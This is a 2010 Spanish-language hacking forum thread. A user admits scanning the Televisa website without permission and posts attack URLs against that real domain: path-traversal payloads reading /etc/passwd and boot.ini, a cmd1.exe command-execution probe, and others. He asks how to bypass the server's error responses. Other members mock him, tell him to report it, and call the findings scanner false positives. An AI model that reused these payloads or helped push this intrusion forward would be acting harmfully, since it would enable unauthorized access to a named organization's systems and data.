vulnerabilidad en la pagina de televisa...necesito su ayuda

Iniciado por shadownhack, 29 Junio 2010, 06:10 AM

0 Miembros y 1 Visitante están viendo este tema.

shadownhack

hola, soy nuevo jeje, pero bueno, espero que me ayuden ;-), bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode,  con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link  no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links

http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd


http://www.televisa.com/cgi-bin/w3-msql


http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir


http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT


http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories


buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe


salu2 espero que me ayuden

gracias




Shell Root

1. Reportalo!
2. LO SENTIMOS, NO SE ENCONTRÓ EL DOCUMENTO QUE BUSCAS
3. xD, porque me late que no las encontraste tú, sino un scanner :P
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

shadownhack

pz obvio, usa varios scanner, ya habia podido vulnerar servidores, con metasploit,

mira, utilizo  nmap+nessus+metasploit 

Darioxhcx

Cita de: shellroot@alex-laptop:~$ en 29 Junio 2010, 06:22 AM
1. Reportalo!
2. LO SENTIMOS, NO SE ENCONTRÓ EL DOCUMENTO QUE BUSCAS
3. xD, porque me late que no las encontraste tú, sino un scanner :P
obvio pa
los l33ts h4x0rs usamos scanners ;D
jajajaja :P

tragantras

los scaneres sueltan muchos falsos positivos, entre ellos todos los que has puesto
Colaboraciones:
1 2

EvilGoblin

Dudo mucho que haya usado Nessus como Dios manda =P


Y decir "scannie y me salio esto; que hago?" demuestra lo poco que entiendes del Tema.

No hay ninguna pregunta Especifica y por eso salen respuestas Random :P
Experimental Serial Lain [Linux User]